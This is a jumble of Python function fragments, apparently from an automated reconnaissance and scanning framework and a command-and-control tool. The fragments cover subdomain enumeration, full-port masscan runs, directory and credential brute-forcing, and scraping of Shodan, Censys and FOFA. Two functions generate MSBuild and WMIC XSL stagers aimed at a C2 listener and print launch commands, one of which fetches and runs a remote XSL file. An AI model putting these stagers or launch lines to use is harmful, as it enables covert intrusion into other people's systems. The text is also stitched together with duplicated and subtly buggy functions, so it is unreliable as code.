def observatory(self): utils.print_good('Starting observatory') if self.is_direct: domain_file = self.is_direct else: if self.options['SPEED'] == 'quick': utils.print_good('Skipping {0} in quick mode'.format(self.module_name)) return None domain_file = utils.replace_argument( self.options, '$WORKSPACE/subdomain/final-$OUTPUT.txt') with open(domain_file, 'r') as d: domains = d.read().splitlines() if self.options['DEBUG'] == "True": utils.print_info("Only get 30 target debug mode") domains = domains[:10] for part in list(utils.chunks(domains, 1)): for domain in part: cmd = 'observatory --rescan -q {0} --format=json -z --attempts 50 | tee $WORKSPACE/headers/details/{0}-observatory.json'.format( domain.strip()) cmd = utils.replace_argument(self.options, cmd) execute.send_cmd(self.options, cmd, '', '', self.module_name, nolog=True) time.sleep(10) utils.just_waiting(self.options, self.module_name, seconds=10, times=2) return True
def brutespray(self): utils.print_good('Starting brutespray') cmd = 'python $PLUGINS_PATH/brutespray/brutespray.py --file $WORKSPACE/vulnscan/$TARGET-nmap.xml --threads 5 --hosts 5 -o $WORKSPACE/bruteforce/$OUTPUT/' cmd = utils.replace_argument(self.options, cmd) utils.print_info("Execute: {0} ".format(cmd)) execute.run(cmd) utils.check_output(self.options, '$WORKSPACE/bruteforce/$OUTPUT/')
def __init__(self, options): utils.print_banner("IP Discovery") utils.make_directory(options['WORKSPACE'] + '/ipspace') self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info("It's already done. use '-f' options to force rerun the module") return slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start IP Discovery for {0}'.format(self.options['TARGET']) }) self.initial() utils.just_waiting(self.options, self.module_name) try: self.conclude() except: utils.print_bad("Something wrong with conclude for {0}".format(self.module_name)) slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name), 'content': 'Done IP Discovery for {0}'.format(self.options['TARGET']) })
def dig_info(self): utils.print_good('Starting basic Dig') utils.make_directory(self.options['WORKSPACE'] + '/screenshot/digs') final_subdomains = utils.replace_argument(self.options, '$WORKSPACE/subdomain/final-$OUTPUT.txt') #run command directly instead of run it via module cause there're a lot of command to run all_domains = utils.just_read(final_subdomains).splitlines() if self.options['DEBUG'] == 'True': all_domains = all_domains[:10] custom_logs = {"module": self.module_name, "content": []} for part in list(utils.chunks(all_domains, 5)): for domain in part: cmd = utils.replace_argument( self.options, 'dig all {0} | tee $WORKSPACE/screenshot/digs/{0}.txt'.format(domain)) output_path = utils.replace_argument(self.options, 'tee $WORKSPACE/screenshot/digs/{0}.txt'.format(domain)) execute.send_cmd(self.options, cmd, '', '', self.module_name, True) # time.sleep(0.5) custom_logs['content'].append( {"cmd": cmd, "std_path": '', "output_path": output_path, "status": "Done"}) #just wait couple seconds and continue but not completely stop the routine time.sleep(5) print(custom_logs) #submit a log utils.print_info('Update activities log') utils.update_activities(self.options, str(custom_logs))
def __init__(self, options): utils.print_banner("Port Scanning") utils.make_directory(options['WORKSPACE'] + '/portscan') utils.make_directory(options['WORKSPACE'] + '/subdomain') self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info( "It's already done. use '-f' options to force rerun the module") return self.is_direct = utils.is_direct_mode(options, require_input=True) slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Port Scanning for {0}'.format(self.options['TARGET']) }) self.initial() utils.just_waiting(self.options, self.module_name, seconds=60) # self.create_ip_result() self.conclude() slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Port Scanning for {0}'.format(self.options['TARGET']) })
def __init__(self, options): utils.make_directory(options['WORKSPACE'] + '/bruteforce/') self.options = options if utils.resume(self.options, self.module_name): utils.print_info("It's already done. use '-f' options to force rerun the module") return if self.options['SPEED'] == 'slow': self.routine() elif self.options['SPEED'] == 'quick': utils.print_good("Skipping for quick speed")
def dirsearch(self): utils.print_good('Starting dirsearch') if self.is_direct: domains = utils.just_read(self.is_direct).splitlines() else: #matching IP with subdomain main_json = utils.reading_json(utils.replace_argument( self.options, '$WORKSPACE/$COMPANY.json')) domains = [x.get('Domain') for x in main_json['Subdomains']] if self.options['DEBUG'] == 'True': domains = domains[:5] custom_logs = {"module": self.module_name, "content": []} for part in utils.chunks(domains, 3): for domain in part: #just strip everything to save local, it won't affect the result strip_domain = domain.replace( 'http://', '').replace('https://', '').replace('/', '-') cmd = "python3 $PLUGINS_PATH/dirsearch/dirsearch.py -b -e php,zip,aspx,js --wordlist=$PLUGINS_PATH/wordlists/really-quick.txt --simple-report=$WORKSPACE/directory/quick/{1}-dirsearch.txt -t 50 -u {0}".format( domain, strip_domain) cmd = utils.replace_argument(self.options, cmd) output_path = utils.replace_argument( self.options, '$WORKSPACE/directory/quick/{0}-dirsearch.txt'.format(strip_domain)) std_path = utils.replace_argument( self.options, '$WORKSPACE/directory/quick/std-{0}-dirsearch.std'.format(strip_domain)) execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name) # time.sleep(0.5) #set status to done because this gonna will be submit when all command was done custom_logs['content'].append( {"cmd": cmd, "std_path": std_path, "output_path": output_path, "status": "Done"}) #just wait couple seconds and continue but not completely stop the routine time.sleep(20) #submit a log utils.print_info('Update activities log') # utils.update_activities(self.options, str(custom_logs)) utils.force_done(self.options, self.module_name) #just save commands logfile = utils.replace_argument(self.options, '$WORKSPACE/log.json') utils.save_all_cmd(self.options, logfile)
def __init__(self, options): utils.print_banner("SSL Scanning") utils.make_directory(options['WORKSPACE'] + '/ssl/') self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info("It's already done. use '-f' options to force rerun the module") return slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start SSL Scanning for {0}'.format(self.options['TARGET']) }) self.initial() utils.just_waiting(self.options, self.module_name)
def quick_gobuster(self): utils.print_good('Starting gobuster for short wordlist') if self.is_direct: domains = utils.just_read(self.is_direct).splitlines() else: #matching IP with subdomain main_json = utils.reading_json(utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json')) domains = [x.get('Domain') for x in main_json['Subdomains']] if self.options['DEBUG'] == 'True': domains = domains[:5] custom_logs = {"module": self.module_name, "content": []} for part in utils.chunks(domains, 3): for domain in part: #just strip everything to save local, it won't affect the result strip_domain = domain.replace( 'http://', '').replace('https://', '').replace('/', '-') cmd = '$GO_PATH/gobuster -k -q -e -x php,jsp,aspx,html,json -w $PLUGINS_PATH/wordlists/quick-content-discovery.txt -t 100 -o $WORKSPACE/directory/{1}-gobuster.txt -s 200,301,307 -u "{0}" '.format( domain.strip(), strip_domain) cmd = utils.replace_argument(self.options, cmd) output_path = utils.replace_argument( self.options, '$WORKSPACE/directory/quick/{0}-gobuster.txt'.format(strip_domain)) std_path = utils.replace_argument( self.options, '$WORKSPACE/directory/quick/std-{0}-gobuster.std'.format(strip_domain)) execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name) # time.sleep(0.5) #set status to done because this gonna will be submit when all command was done custom_logs['content'].append({"cmd": cmd, "std_path": std_path, "output_path": output_path, "status": "Done"}) #just wait couple seconds and continue but not completely stop the routine time.sleep(20) #submit a log utils.print_info('Update activities log') utils.force_done(self.options, self.module_name) # utils.update_activities(self.options, str(custom_logs)) #just save commands logfile = utils.replace_argument(self.options, '$WORKSPACE/log.json') utils.save_all_cmd(self.options, logfile)
def normal(options): utils.print_good("Running with {0} speed".format(options['SPEED'])) # Create skeleton json initials.Initials(options) ##Finding subdomain subdomain.SubdomainScanning(options) ##waiting for previous module utils.just_waiting(options, 'SubdomainScanning') # ##Scanning for subdomain take over takeover.TakeOverScanning(options) ##Screen shot the target on common service screenshot.ScreenShot(options) ##Recon recon.Recon(options) ##Scanning for CorsScan cors.CorsScan(options) # ##Discovery IP space ipspace.IPSpace(options) # ##SSL Scan sslscan.SSLScan(options) # ##Headers Scan headers.HeadersScan(options) # ##### Note: From here the module gonna take really long time for scanning service and stuff like that utils.print_info('This gonna take a while') # #Scanning all port using result from subdomain scanning and also checking vulnerable service based on version portscan.PortScan(options) #Directory scan dirbrute.DirBrute(options) # #Starting vulnerable scan vulnscan.VulnScan(options) # brutethings.BruteThings(options) conclusion.Conclusion(options)
def generate(self, listener, filename=None, as_string=False): stager_filename = filename if filename else 'msbuild.xml' with open('stagers/templates/msbuild.xml') as template: template = template.read() template = template.replace('C2_URL', f"{listener.name}://{listener['BindIP']}:{listener['Port']}") if not as_string: with open(stager_filename, 'w') as stager: stager.write(template) print_good(f"Generated stager to {stager.name}") print_info( f"Launch with 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe {stager_filename}'") else: return template
def __init__(self, options): utils.print_banner("ScreenShot the target") utils.make_directory(options['WORKSPACE'] + '/screenshot') self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info("It's already done. use '-f' options to force rerun the module") return slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start ScreenShot for {0}'.format(self.options['TARGET']) }) self.initial() slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name), 'content': 'Done ScreenShot for {0}'.format(self.options['TARGET']) })
def custom_help(): utils.print_info("Visit this page for complete usage: https://github.com/j3ssie/Osmedeus/wiki") print('''{1} {2}Basic Usage{1} =========== python3 osmedeus.py -t <your_target> python3 osmedeus.py -T <list_of_targets> {2}Advanced Usage{1} ============== {0}[*] List all module{1} python3 osmedeus.py -M {0}[*] Running with specific module{1} python3 osmedeus.py -t <result_folder> -m <module_name> -i <your_target> {0}[*] Example command{1} python3 osmedeus.py -t sample2 -m vuln -i hosts.txt python3 osmedeus.py -t sample2 -m dirb -i /tmp/list_of_hosts.txt {2}Remote Options{1} ============== --remote REMOTE Remote address for API, (default: https://127.0.0.1:5000) --auth AUTH Specify auth tication e.g: --auth="username:password" See your config file for more detail (default: {2}core/config.conf{1}) --client just run client stuff in case you ran the flask server before {2}More options{1} ============== --update Update lastest from git -c CONFIG, --config CONFIG Specify config file (default: {2}core/config.conf{1}) -w WORKSPACE, --workspace WORKSPACE Custom workspace folder -f, --force force to run the module again if output exists -v, --verbose show verbose output -q, --quick run this tool with quick routine -s, --slow run this tool with slow routine --debug Just for debug purpose '''.format(G, GR, B)) sys.exit(0)
def masscan(self): utils.print_good('Starting masscan') time.sleep(1) main_json = utils.reading_json( utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json')) main_json['Modules'][self.module_name] = [] if self.options['SPEED'] == 'slow': ip_list = [ x.get("IP") for x in main_json['Subdomains'] if x.get("IP") is not None ] + main_json['IP Space'] elif self.options['SPEED'] == 'quick': ip_list = [ x.get("IP") for x in main_json['Subdomains'] if x.get("IP") is not None ] ip_list = set([ip for ip in ip_list if ip != 'N/A']) if self.options['DEBUG'] == "True": utils.print_info("just testing 5 first host") ip_list = list(ip_list)[:5] # print(ip_list) utils.just_write( utils.replace_argument(self.options, '$WORKSPACE/subdomain/IP-$TARGET.txt'), "\n".join(ip_list)) # print(ip_list) time.sleep(1) # cmd = "sudo masscan --rate 10000 -p0-65535 -iL $WORKSPACE/subdomain/IP-$TARGET.txt -oJ $WORKSPACE/portscan/$OUTPUT-masscan.json --wait 0" cmd = "sudo masscan --rate 1000 -p0-65535 -iL $WORKSPACE/subdomain/IP-$TARGET.txt -oX $WORKSPACE/portscan/$OUTPUT-masscan.xml --wait 0" cmd = utils.replace_argument(self.options, cmd) output_path = utils.replace_argument( self.options, '$WORKSPACE/portscan/$OUTPUT-masscan.xml') std_path = utils.replace_argument( self.options, '$WORKSPACE/portscan/std-$OUTPUT-masscan.std') execute.send_cmd(cmd, output_path, std_path, self.module_name)
def get_asn(self): ip_target = utils.resolve_input(self.target) if not ip_target: return False utils.print_banner(f"Starting scraping detail ASN of {ip_target}") utils.print_info(f'Get ASN from IP: {ip_target}') url = f'https://ipinfo.io/{ip_target}/json' r = sender.send_get(self.options, url, None) org_info = r.json().get('org') asn = utils.get_asn(org_info) if asn: utils.print_info(f"Detect target running on {asn}") ips = self.get_asn_ip(asn) utils.just_write(self.options['output'], "\n".join(ips)) utils.just_cleanup(self.options['output']) else: return False
def massdns(self): utils.print_good('Starting massdns') cmd = '$PLUGINS_PATH/massdns/scripts/subbrute.py $DOMAIN_FULL $TARGET | $PLUGINS_PATH/massdns/bin/massdns -r $PLUGINS_PATH/massdns/lists/resolvers.txt -t A -o S -w $WORKSPACE/subdomain/raw-massdns.txt' # cmd = '$PLUGINS_PATH/massdns/scripts/subbrute.py $PLUGINS_PATH/massdns/lists/names.txt $TARGET | $PLUGINS_PATH/massdns/bin/massdns -r $PLUGINS_PATH/massdns/lists/resolvers.txt -t A -o S -w $WORKSPACE/subdomain/$OUTPUT-massdns.txt' cmd = utils.replace_argument(self.options, cmd) utils.print_info("Execute: {0} ".format(cmd)) execute.run(cmd) massdns_raw = utils.replace_argument(self.options, '$WORKSPACE/subdomain/raw-massdns.txt') massdns_output = utils.replace_argument(self.options, '$WORKSPACE/subdomain/$OUTPUT-massdns.txt') with open(massdns_raw, 'r+') as d: ds = d.read().splitlines() for line in ds: newline = line.split(' ')[0][:-1] with open(massdns_output, 'a+') as m: m.write(newline + "\n") utils.check_output(self.options, '$WORKSPACE/subdomain/$OUTPUT-massdns.txt')
def generate(self, listener): with open('wmic.xsl', 'w') as stager: with open('stagers/templates/wmic.xsl') as template: template = template.read() template = template.replace( 'C2_URL', f"https://{listener['BindIP']}:{listener['Port']}") template = template.replace('C2_CHANNEL', f"{listener.name}") stager.write(template) print_good(f"Generated stager to {stager.name}") print_info("Launch with:") print( '\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:"https://myurl/wmic.xsl"' ) print( '\tC:\\Windows\\System32\\wbem\\WMIC.exe os get /format:"wmic.xsl"' )
def single_query(options): utils.print_debug(options, options) utils.print_info("Query: {0}".format(options.get('query'))) if not options.get('source'): utils.print_bad("You need to specify Search engine") return if 'fofa' in options.get('source'): fofa.Fofa(options) if 'shodan' in options.get('source'): shodan.Shodan(options) if 'censys' in options.get('source'): censys.Censys(options) if 'zoom' in options.get('source'): zoomeye.ZoomEye(options)
def initial(self): # prepare url query = utils.url_encode(self.options['shodan_query']) url = 'https://www.shodan.io/search?query={1}&page={0}'.format(str(1), query) self.sending(url) # brute the country if self.options['brute']: self.brute_country_code(query) # repeat the routine with filter by city query_by_cities = self.optimize(query) if query_by_cities: for item in query_by_cities: utils.print_info( "Get more result by filter with {0} city".format(item.get('city'))) self.sending(item.get('url'))
def normal(options): utils.print_good("Running with {0} speed".format(options['SPEED'])) # Create skeleton json initials.Initials(options) ##Finding subdomain subdomain.SubdomainScanning(options) ##waiting for previous module utils.just_waiting('SubdomainScanning') # ##Scanning for subdomain take over takeover.TakeOverScanning(options) ##Screen shot the target on common service screenshot.ScreenShot(options) ##Scanning for CorsScan cors.CorsScan(options) # ##Discovery IP space ipspace.IPSpace(options) # ##SSL Scan sslscan.SSLScan(options) # ##Headers Scan headers.HeadersScan(options) # ##### Note: From here the module gonna take really long time for scanning service and stuff like that utils.print_info('This gonna take a while') # #Scanning all port using result from subdomain scanning and also checking vulnerable service based on version portscan.PortScan(options) # #Starting vulnerable scan vulnscan.VulnScan(options) # #Brute force service from port scan result # brutethings.BruteThings(options) conclusion.Conclusion(options)
def post(self, request, *args, **kwargs): serializer = ExecuteSerializer(data=request.data) serializer.is_valid(raise_exception=True) data = serializer.data forced = data.get('forced') cmd = data.get('cmd') output_path = data.get('output_path') cmd_type = data.get('cmd_type') # don't care about the status nolog = data.get('nolog') # forced check if output path exist if not forced: if utils.not_empty_file(output_path): return common.message(500, "Commands is already done") # set idle status if nolog: data['status'] = 'Done' else: data['status'] = 'Running' item = parse_data(data) instance = Activities.objects.create(**item) Logs.objects.create(**item) command_record = instance.as_json() # really run the command if cmd_type == 'single': utils.print_info("Execute: {0} ".format(cmd)) execute.run_single(command_record) elif cmd_type == 'list': utils.print_info("Execute chunk: {0} ".format(cmd)) commands = execute.get_chunk_commands(command_record) execute.run_chunk(commands, command_record.get( 'chunk'), command_record.get('delay')) # update status after done if instance.status != 'Done': instance.status = 'Done' instance.save() return common.message(200, "Commands is done")
def permutation(self): # running goaltdns if self.options['SPEED'] == 'quick': utils.print_info('Skip permutation subdomain for quick mode') return None elif self.options['SPEED'] == 'slow': cmd = '$GO_PATH/goaltdns -w $PLUGINS_PATH/wordlists/short-permutation.txt -l $WORKSPACE/subdomain/full-$OUTPUT.txt -o $WORKSPACE/subdomain/permutation-$OUTPUT.txt' cmd = utils.replace_argument(self.options, cmd) output_path = utils.replace_argument( self.options, '$WORKSPACE/subdomain/permutation-$OUTPUT.txt') execute.send_cmd(self.options, cmd, output_path, '', self.module_name) utils.just_waiting(self.options, self.module_name, seconds=5) # resolve generated domain to verify it cmd2 = '$PLUGINS_PATH/massdns/bin/massdns -r $PLUGINS_PATH/massdns/lists/resolvers.txt --sticky -t A --verify-ip -q -o S -w $WORKSPACE/subdomain/massdns-permutation-$OUTPUT.txt $WORKSPACE/subdomain/permutation-$OUTPUT.txt' cmd2 = utils.replace_argument(self.options, cmd2) output_path2 = utils.replace_argument( self.options, '$WORKSPACE/subdomain/massdns-IP-$OUTPUT.txt') execute.send_cmd(self.options, cmd, output_path2, '', self.module_name) utils.just_waiting(self.options, self.module_name, seconds=5) # strip out some false positive cause some resolvers are crazy raw_permutation = utils.just_read(output_path2) permutation_domains = [] if raw_permutation: # finding false positive false_positive = [] tmp_false_positive = [] for line in raw_permutation.splitlines(): tmp_false_positive.append(line.split('. A')[1]) for item in tmp_false_positive: if tmp_false_positive.count(item) > 3: false_positive.append(item) # really adding things for line in raw_permutation.splitlines(): if line.split('. A ')[1] not in false_positive: permutation_domains.append( line.split('. A ')[0]) return permutation_domains
def masscan(self): utils.print_good('Starting masscan') time.sleep(1) if self.is_direct: ip_file = utils.replace_argument( self.options, '$WORKSPACE/subdomain/final-IP-$OUTPUT.txt') # print(ip_file) # print(utils.just_read(ip_file)) ip_list = utils.just_read(ip_file).splitlines() ip_list = list(set([ip for ip in ip_list if ip != 'N/A'])) else: main_json = utils.reading_json(utils.replace_argument( self.options, '$WORKSPACE/$COMPANY.json')) main_json['Modules'][self.module_name] = [] if self.options['SPEED'] == 'slow': ip_list = [x.get("IP") for x in main_json['Subdomains'] if x.get("IP") is not None] + main_json['IP Space'] elif self.options['SPEED'] == 'quick': ip_list = [x.get("IP") for x in main_json['Subdomains'] if x.get("IP") is not None] ip_list = set([ip for ip in ip_list if ip != 'N/A']) if self.options['DEBUG'] == "True": utils.print_info("just testing 5 first host") ip_list = list(ip_list)[:5] utils.just_write(utils.replace_argument( self.options, '$WORKSPACE/subdomain/IP-$TARGET.txt'), "\n".join(ip_list)) # print(ip_list) time.sleep(1) cmd = "sudo masscan --rate 1000 -p0-65535 -iL $WORKSPACE/subdomain/IP-$TARGET.txt -oX $WORKSPACE/portscan/$OUTPUT-masscan.xml --wait 0" cmd = utils.replace_argument(self.options, cmd) output_path = utils.replace_argument( self.options, '$WORKSPACE/portscan/$OUTPUT-masscan.xml') std_path = utils.replace_argument( self.options, '$WORKSPACE/portscan/std-$OUTPUT-masscan.std') execute.send_cmd(self.options, cmd, output_path, std_path, self.module_name)
def __init__(self, options): utils.print_banner("CORS Scanning") utils.make_directory(options['WORKSPACE'] + '/cors') self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info("It's already done. use '-f' options to force rerun the module") return slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Scanning CORS for {0}'.format(self.options['TARGET']) }) self.initial() utils.just_waiting(self.options, self.module_name) slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name), 'content': 'Done Scanning CORS for {0}'.format(self.options['TARGET']) }) utils.print_line()
def dirsearch(self): utils.print_good('Starting dirsearch') #matching IP with subdomain main_json = utils.reading_json( utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json')) domains = [x.get('Domain') for x in main_json['Subdomains']] if self.options['DEBUG'] == 'True': domains = domains[:5] custom_logs = {"module": self.module_name, "content": []} for part in list(utils.chunks(domains, 2)): for domain in part: cmd = "python3 $PLUGINS_PATH/dirsearch/dirsearch.py --json-report=$WORKSPACE/directory/{0}-dirsearch.json -u '{0}' -e php,jsp,aspx,js,html -t 20 -b".format( domain) cmd = utils.replace_argument(self.options, cmd) output_path = utils.replace_argument( self.options, '$WORKSPACE/directory/{0}-dirsearch.json'.format(domain)) std_path = utils.replace_argument( self.options, '$WORKSPACE/directory/std-{0}-dirsearch.std'.format( domain)) execute.send_cmd(cmd, output_path, std_path, self.module_name, True) # time.sleep(0.5) #set status to done because this gonna will be submit when all command was done custom_logs['content'].append({ "cmd": cmd, "std_path": std_path, "output_path": output_path, "status": "Done" }) #just wait couple seconds and continue but not completely stop the routine time.sleep(20) #submit a log utils.print_info('Update activities log') utils.update_activities(str(custom_logs))
def do_login(self): utils.print_info("Reauthen using credentials from: {0}".format( self.options.get('config'))) login_url = 'https://censys.io/login' r = sender.send_get(self.options, login_url, cookies=None) if r.status_code == 200: cookies = r.cookies form = utils.soup(r.text).find_all("form") if form: inputs = form[0].findChildren('input') for tag in inputs: if tag.get('name') == 'csrf_token': csrf_token = tag.get('value') username, password = utils.get_cred(self.options, source='censys') data = { "csrf_token": csrf_token, "came_from": "/", "from_censys_owned_external": "False", "login": username, "password": password } really_login_url = 'https://censys.io/login' r1 = sender.send_post(self.options, really_login_url, cookies, data, follow=False) if r1.status_code == 302: for item in r1.cookies.items(): if item.get('auth_tkt'): censys_cookies = item.get('auth_tkt') utils.set_session(self.options, censys_cookies, source='censys') return censys_cookies return False
def pages(self, page_num): for i in range(2, int(page_num) + 1): utils.print_info("Get more result from page: {0}".format(str(i))) utils.random_sleep(1, 2) query = utils.url_encode(self.options['censys_query']) url = 'https://censys.io/ipv4/_search?q={1}&page={0}'.format( str(i), query) r = sender.send_get(self.options, url, self.cookies) if r.status_code == 200: response = r.text if 'class="alert alert-danger"' in response: utils.print_bad("Reach to the limit at page {0}".format( str(i))) return else: soup = utils.soup(response) self.analyze(soup)
def __init__(self, options): utils.print_banner("Scanning for Subdomain TakeOver") self.module_name = self.__class__.__name__ self.options = options if utils.resume(self.options, self.module_name): utils.print_info("It's already done. use '-f' options to force rerun the module") return slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Scanning TakeOver for {0}'.format(self.options['TARGET']) }) self.initial() slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1} ".format(self.options['TARGET'], self.module_name), 'content': 'Done Scanning TakeOver for {0}'.format(self.options['TARGET']) }) utils.print_banner("{0} Done".format(self.module_name))
def default_config(config_path=None): if not config_path: config_path = str(Path.home().joinpath('.osmedeus/config.conf')) utils.print_info("Detect config at: {0}".format(config_path)) core_config = ConfigParser(interpolation=ExtendedInterpolation()) core_config.read(config_path) sections = core_config.sections() options = { 'CONFIG_PATH': os.path.abspath(config_path), } for sec in sections: for key in core_config[sec]: options[key.upper()] = core_config.get(sec, key) utils.print_info("Clean config.conf file") os.remove(config_path) return options
def sending(self, url): # sending request and return the response r = sender.send_get(self.options, url, self.cookies) if r: response = r.text if self.options['store_content']: ts = str(int(time.time())) raw_file = self.options['raw'] + \ "/shodan/{0}_{1}".format(utils.url_encode( url.replace(self.base_url, '')).replace('/', '_'), ts) utils.just_write(raw_file, response) soup = utils.soup(response) self.analyze(soup) # checking if there is many pages or not if self.logged_in and not self.options['disable_pages']: utils.print_info("Continue grab more pages") self.pages(self.get_num_pages(url))
def generate(self, listener, filename=None, as_string=False): stager_filename = filename if filename else 'msbuild.xml' with open('stagers/templates/msbuild.xml') as template: template = template.read() template = template.replace( 'C2_URL', f"{listener.name}://{listener['BindIP']}:{listener['Port']}") if not as_string: with open(stager_filename, 'w') as stager: stager.write(template) print_good(f"Generated stager to {stager.name}") print_info( f"Launch with 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\msbuild.exe {stager_filename}'" ) else: return template
def do_login(self): utils.print_info("Reauthen using credentials from: {0}".format( self.options.get('config'))) login_url = 'https://i.nosec.org/login?service=http%3A%2F%2Ffofa.so%2Fusers%2Fservice' r = sender.send_get(self.options, login_url, cookies=None) if r.status_code == 200: cookies = r.cookies form = utils.soup(r.text).find(id="login-form") inputs = form.findChildren('input') for tag in inputs: if tag.get('name') == 'authenticity_token': authenticity_token = tag.get('value') if tag.get('name') == 'lt': lt = tag.get('value') if tag.get('name') == 'authenticity_token': authenticity_token = tag.get('value') username, password = utils.get_cred(self.options, source='fofa') data = { "utf8": "\xe2\x9c\x93", "authenticity_token": authenticity_token, "lt": lt, "service": "http://fofa.so/users/service", "username": username, "password": password, "rememberMe": "1", "button": '' } really_login_url = 'https://i.nosec.org/login' r1 = sender.send_post(self.options, really_login_url, cookies, data) if r1.status_code == 200: fofa_cookie = r1.cookies.get('_fofapro_ars_session') utils.set_session(self.options, fofa_cookie, source='fofa') return fofa_cookie return False
def debug(options): utils.print_good("Debug routine") utils.print_good("Running with {0} speed".format(options['SPEED'])) # Create skeleton json pprint(options) # initials.Initials(options) ###Finding subdomain # subdomain.SubdomainScanning(options) ####waiting for previous module # # utils.just_waiting('SubdomainScanning') ###Screen shot the target on common service # screenshot.ScreenShot(options) ###Scanning for subdomain take over # takeover.TakeOverScanning(options) ##Discovery IP space # ipspace.IPSpace(options) # # ##Scanning for CorsScan # cors.CorsScan(options) ### SSL Scan # sslscan.SSLScan(options) ##Headers Scan # headers.HeadersScan(options) ##### Note: From here the module gonna take really long time for scanning service and stuff like that utils.print_info('This gonna take a while') # dirbrute.DirBrute(options) #Scanning all port using result from subdomain scanning and also checking vulnerable service based on version portscan.PortScan(options)
def pages(self, page_num): for i in range(2, int(page_num) + 1): utils.random_sleep(1, 2) utils.print_info("Get more result from page: {0}".format(str(i))) query = utils.url_encode(self.options['zoomeye_query']) url = 'https://www.zoomeye.org/search?q={0}&t=host&p={1}'.format( query, str(i)) r = sender.send_get(self.options, url, headers=self.headers) if r.status_code == 200: response = r.text if '"msg": "forbidden"' in response: utils.print_bad("Reach to the limit at page {0}".format( str(i))) return else: json_response = utils.get_json(response) self.analyze(json_response) self.optimize(json_response)
def __init__(self, options): utils.print_banner("Scanning through BurpState") utils.make_directory(options['WORKSPACE'] + '/burpstate/') self.module_name = self.__class__.__name__ self.options = options self.options['CURRENT_MODULE'] = self.module_name self.options['SPEED'] = utils.custom_speed(self.options) if utils.resume(self.options, self.module_name): utils.print_info("It's already done. use '-f' options to force rerun the module") return slack.slack_noti('status', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Scanning BurpState for {0}'.format(self.options['TARGET']) }) self.initial() slack.slack_noti('good', self.options, mess={ 'title': "{0} | {1}".format(self.options['TARGET'], self.module_name), 'content': 'Start Scanning BurpState for {0}'.format(self.options['TARGET']) }) self.conclude()
def pages(self, page_num): for i in range(2, int(page_num) + 1): utils.print_info("Get more result from page: {0}".format(str(i))) query = utils.url_encode( utils.just_b64_encode(self.options['fofa_query'])) url = 'https://fofa.so/result?page={0}&qbase64={1}'.format( str(i), query) utils.print_debug(self.options, url) r = sender.send_get(self.options, url, self.cookies) if r.status_code == 200: response = r.text if 'class="error"' in response: utils.print_bad("Reach to the limit at page {0}".format( str(i))) return else: soup = utils.soup(response) self.analyze(soup)
def dig_info(self): utils.print_good('Starting basic Dig') utils.make_directory(self.options['WORKSPACE'] + '/screenshot/digs') final_subdomains = utils.replace_argument( self.options, '$WORKSPACE/subdomain/final-$OUTPUT.txt') #run command directly instead of run it via module cause there're a lot of command to run all_domains = utils.just_read(final_subdomains).splitlines() if self.options['DEBUG'] == 'True': all_domains = all_domains[:10] custom_logs = {"module": self.module_name, "content": []} for part in list(utils.chunks(all_domains, 5)): for domain in part: cmd = utils.replace_argument( self.options, 'dig all {0} | tee $WORKSPACE/screenshot/digs/{0}.txt'. format(domain)) output_path = utils.replace_argument( self.options, 'tee $WORKSPACE/screenshot/digs/{0}.txt'.format(domain)) execute.send_cmd(self.options, cmd, '', '', self.module_name, True) # time.sleep(0.5) custom_logs['content'].append({ "cmd": cmd, "std_path": '', "output_path": output_path, "status": "Done" }) #just wait couple seconds and continue but not completely stop the routine time.sleep(5) print(custom_logs) #submit a log utils.print_info('Update activities log') utils.update_activities(self.options, str(custom_logs)) utils.print_line()
def routine(options): #Finding subdomain subdomain.SubdomainScanning(options) #Scanning for subdomain take over takeover.TakeOverScanning(options) #Screen shot the target on common service screenshot.ScreenShot(options) ##### Note: From here the module gonna take really long time for scanning service and stuff like that utils.print_info('This gonna take a while') #Scanning all port using result from subdomain scanning and also checking vulnerable service based on version portscan.PortScan(options) #Starting vulnerable scan vulnscan.VulnScan(options) #Brute force service from port scan result brutethings.BruteThings(options)
